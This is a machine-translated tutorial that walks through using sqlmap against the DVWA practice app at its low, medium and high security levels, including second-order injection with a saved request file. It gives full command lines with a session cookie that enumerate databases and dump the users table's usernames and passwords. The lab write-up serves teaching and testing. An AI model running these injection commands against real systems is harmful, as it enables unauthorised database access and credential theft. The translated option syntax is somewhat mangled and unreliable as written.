Shulou(Shulou.com)05/31 Report--

This article is to share with you about the example analysis of Sqlmap automation injection, the editor thinks it is very practical, so I share it with you to learn. I hope you can get something after reading this article.

Automatic injection of dvwa using sqlmap

Set the dvwa level to low

Open dvwa's SQL Injection (SQL Injection (Blind)), open the browser to debug, type user id and submit, and view the intercepted requests.

You can see that it's a GET request, url "http://192.168.1.222:8089/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#".

Let's test it directly to salmap, using the-u command-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#".

You can see that you need to log in here, otherwise you can't get out. So we need to add a cookie to maintain login

6. Use the burp suite agent to grab the package, get the login cookie, and add-- dbs burst data-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"-- cookie=" PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low "--dbs.

You can see that the database that popped out is mysql.

7. We use-D xxx to specify the database to view, and-- tables to view all the tables in the database:-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"-- cookie=" PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low "- D dvwa-- tables

Check the results of the run:

8. We use-D xxx-T ttt to specify the table to view and-- columns to view the columns of the table

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"-- cookie=" PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low "- D dvwa-T users-- columns

9. We view the database with-D xxx, specify the table to view with-T xxx, view the columns of the table with-C xxx, and view the data of the columns with-dump

-u "http://192.168.1.222:8089/vulnerabilities/sqli/?id=1&Submit=Submit#"-- cookie=" PHPSESSID=0orf19i6t8svmfo7lu66qrtp07; security=low "- D dvwa-T users-C password,user-- dump

Adjust the dvwa security level to medium, save the crawled packet as a .txt file, put it in the sqlmap directory, and directly-r file name-dbs (subsequent parameters can be added by yourself)

Adjust the dvwa security level to high. Since this submission page is not the same as the page that returned the results, the previous method cannot be used here. To use the method of second-order injection

The URL where the data is submitted

Returned URL

Save the crawled packet as a .txt file, put it in the directory of sqlmap, explode the database, and command:-r 1.txt-- second-url "http://192.168.1.222:8089/vulnerabilities/sqli/"-- batch-- level 2-- dbs.

Exploding table name

-r 1.txt-- second-url "http://192.168.1.222:8089/vulnerabilities/sqli/"-- batch-- level 2-D dvwa-- tables

Exploding list name

-r 1.txt-- second-url "http://192.168.1.222:8089/vulnerabilities/sqli/"

-batch-level 2-D dvwa-T user-- columns

Burst field data

-r 1.txt-- second-url "http://192.168.1.222:8089/vulnerabilities/sqli/"-- batch-- level 2-D dvwa-T users-C user,password-- dump

Some conceptual issues:

Second-order injection: second-order sql injection-second-order sometimes injects the data entered by the point and returns the result not the current page, but another page, so you need to specify which page to get the response to determine whether it is true or false. -second-url is followed by the URL address of a returned page

-- batch: automatic default configuration without manually pressing yes or no

Level: Sqlmap has a total of 5 detection levels, and the default is 1. The higher the level, the more payload is used for probing. Among them, level 5 payload is the most, which will automatically crack cookie, XFF and other head injection. Of course, the higher the level, the slower the detection time. This parameter affects the injection point of the test. Both GET and POST data will be tested, HTTP cookie will be tested when level is 2, and HTTP User-Agent/Referer header will be tested when level is 3. When it is uncertain which parameter is the injection point, in order to ensure accuracy, it is recommended to set level to 5 (the speed also slows down)

The above is the example analysis of Sqlmap automation injection, and the editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.